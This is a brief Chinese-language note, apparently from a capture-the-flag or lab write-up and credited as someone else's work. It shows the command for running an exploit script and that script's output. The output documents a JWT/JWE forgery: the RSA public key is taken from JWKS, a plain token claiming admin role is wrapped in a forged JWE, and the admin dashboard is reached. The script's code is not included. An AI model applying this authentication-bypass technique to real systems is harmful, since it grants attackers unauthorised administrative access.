注意:这不是我的原创作品。我将其保留在此处作为参考。
工作方法:
python3 exploit.py http://IP:PORT
[*] 获取 JWKS...
[+] 获取 RSA 公钥 (kid: enc-key-1)
[*] 构造 sub=admin, role=ROLE_ADMIN 的 PlainJWT
[+] 伪造 JWE 令牌创建成功
[*] 访问 /api/dashboard...
[+] 状态: 200
[+] 认证身份: admin (ROLE_ADMIN)
[+] 令牌: eyJhbGciOiAiUlN_.....[已编辑].....D4zwSEY05lFkCB.J933HR-irY6a0r2uivRLZw